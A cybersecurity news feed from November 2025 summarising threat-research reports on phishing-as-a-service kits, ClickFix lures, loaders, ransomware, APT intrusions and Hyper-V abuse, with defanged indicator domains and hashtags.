On November 5, 2025, multiple high-profile YouTube creators reported receiving fake DMCA takedown notices that linked to malicious downloads, prompting researchers to analyze the campaign and disclose numerous related domains and IPs. Public analysis identified phishing domains (e.g., dmca-security[.]com, ms-team-ping4[.]com), rotating infrastructure with distinctive host banners and certificates, and additional related domains discovered via DNS and host-response pivots. #dmca-security #ms-team-ping4
Tag: EDR
Arctic Wolf Labs discovered a Brazilian-origin Loader-as-a-Service called Caminho that uses LSB steganography to hide .NET loaders inside images hosted on legitimate platforms and delivers diverse payloads including REMCOS RAT, XWorm, and Katz Stealer. The multi-stage campaign uses spear-phishing with obfuscated JS/VBS and PowerShell stages, in-memory .NET loading and process injection,…
The article details a race-condition vulnerability in Microsoft’s Cloud Files Minifilter driver (cldflt.sys) that allows privilege escalation by bypassing filename validation during placeholder creation. The vulnerability follows a time window between validati……
Tycoon 2FA is a Phishing-as-a-Service platform that uses an Adversary-in-the-Middle reverse proxy to capture credentials and session tokens from Microsoft 365 and Gmail logins, bypassing 2FA/MFA by relaying codes in real time. The kit uses obfuscated JavaScript, bot/debugger checks, hosted assets on services like Amazon S3, and dynamic templates to tailor attacks to organization-specific policies. #Tycoon2FA #Microsoft365 #Gmail
A phishing campaign called “I Paid Twice” targeted hotel establishments by using compromised Booking.com accounts and ClickFix social engineering to deliver PowerShell commands that deploy PureRAT, enabling theft of booking-extranet credentials and subsequent customer-targeted banking phishing. The operation leveraged a redirection/TDS infrastructure, hundreds of malicious domains, and a cybercrime ecosystem selling Booking.com logs and services such as traffers and log checkers. #PureRAT #ClickFix
![Cybersecurity News | Daily Recap [06 Nov 2025]](https://www.hendryadrian.com/tweet/image/DailyRecap.png "Cybersecurity News | Daily Recap [06 Nov 2025]")
Daily Recap, Google releases an emergency Chrome 142 update to fix high-risk vulnerabilities including RCE flaws, while Cisco patches critical firewall and UCCX vulnerabilities under active attack. Sandworm deploys data wipers targeting Ukraine’s grain sector, and various APTs use RMM, VM techniques, and covert Hyper-V VMs to evade EDR; notable incidents include SonicWall cloud backup theft, Nikkei breach, Hyundai AutoEver data exposure, and Penn/Israeli contractor compromises. #Chrome142 #CVE-2025-20333 #CVE-2025-20362 #Sandworm #UNK_SmudgedSerpent #APT-C-60 #SpyGlace #CovertHyper-V #SonicWallTheft #Nikkei #HyundaiAutoEver #UPenn
ClickFix attacks have become more sophisticated by incorporating videos, timers, and OS detection to deceive victims into executing malicious commands. These tactics aim to steal information by tricking users into pasting harmful code, often through fake CAPTCHA verifications. #ClickFix #CloudflareCaptcha #Malvertising
Purple teaming promotes collaboration between red and blue teams, shifting from rivalry to continuous validation and improvement in cybersecurity defenses. Breach and Attack Simulation (BAS) automates real-time testing, enabling organizations to close security gaps effectively. #PurpleTeam #BreachAndAttackSimulation
Financial institutions are increasingly required to conduct comprehensive cybersecurity exercises due to new regulations like DORA and CORIE. Advanced simulation tools such as OpenAEV integrate technical and human responses, enhancing cyber-resilience and operational readiness. #DORA #CORIE #cyberresilience…
Chinese-linked APT actors used known exploitation scans and a multi-stage intrusion in April 2025 to establish persistent, stealthy access to a U.S. organization, employing DLL sideloading (vetysafe.exe -> sbamres.dll), legitimate binaries (msbuild.exe, Imjpuexc), scheduled tasks, a custom loader, and DCSync-like activity. #APT41 #Kelp #SpacePirates #Dcsync #DeedRAT
The threat actor Curly COMrades has been exploiting virtualization technology to evade detection and deploy custom malware on targeted systems. Their use of Hyper-V and virtual machines enables persistent remote control and avoids traditional security measures. #CurlyCOMrades #HyperV #Virtualization #CyberattackTools…
Cephalus is a Go-based ransomware group active since mid-June 2025 that breaches organizations mainly by compromising RDP accounts lacking MFA, exfiltrates data, and performs targeted encryption using a custom ransomware that disables protections and deletes backups. The malware uses a single AES-CTR key protected by memory-locking and XOR masking, generates fake…
Bitdefender and Georgian CERT uncovered a sophisticated cyber-espionage campaign by the Russian-aligned group Curly COMrades, using Microsoft Hyper-V virtualization to evade detection. They deployed stealthy virtual machines hosting custom malware families like CurlyShell and CurlCat to establish persistent, covert access to targeted networks in Eastern Europe and the Caucasus. #CurlyCOMrades #HyperV…
Gootloader, a JavaScript-based loader used by Storm-0494 to hand off access to Vanilla Tempest, has resurged with updated evasion including custom WOFF2 glyph-substitution fonts, XOR-encrypted ZIP payloads via compromised WordPress comment endpoints, and Startup-folder persistence enabling rapid reconnaissance and domain controller compromise. Post-intrusion, Vanilla Tempest commonly deploys Supper SOCKS5 backdoor (TextShell-obfuscated) and proceeds with AD enumeration, lateral movement (WinRM), privileged account creation, and ransomware deployment such as Rhysida and BlackCat. #Gootloader #Storm-0494 #Vanilla_Tempest #Supper_backdoor #Rhysida
Proofpoint tracked a previously unidentified threat cluster dubbed UNK_SmudgedSerpent that targeted academics and foreign policy experts between June and August 2025 using benign conversation lures, credential harvesting pages, OnlyOffice and Teams spoofs, and RMM tool deployment. Observed TTPs and infrastructure overlapped with Iranian-aligned groups TA453, TA455, and TA450, but attribution remains…